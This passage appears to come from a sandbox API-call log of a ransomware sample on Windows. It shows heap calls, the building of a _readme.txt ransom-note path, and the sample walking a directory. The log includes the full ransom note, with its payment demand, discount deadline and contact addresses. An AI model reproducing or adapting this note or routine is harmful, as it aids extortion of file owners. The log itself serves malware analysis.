Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.824] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0200.824] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.824] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.824] PathFindFileNameW (pszPath="") returned="" [0200.824] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.824] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.824] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.824] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.825] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0200.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.825] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0200.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.825] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.825] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.825] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.825] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.826] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.826] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.826] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.826] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.826] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.827] RtlAllocateHeap (HeapHandle=0x2c0000, 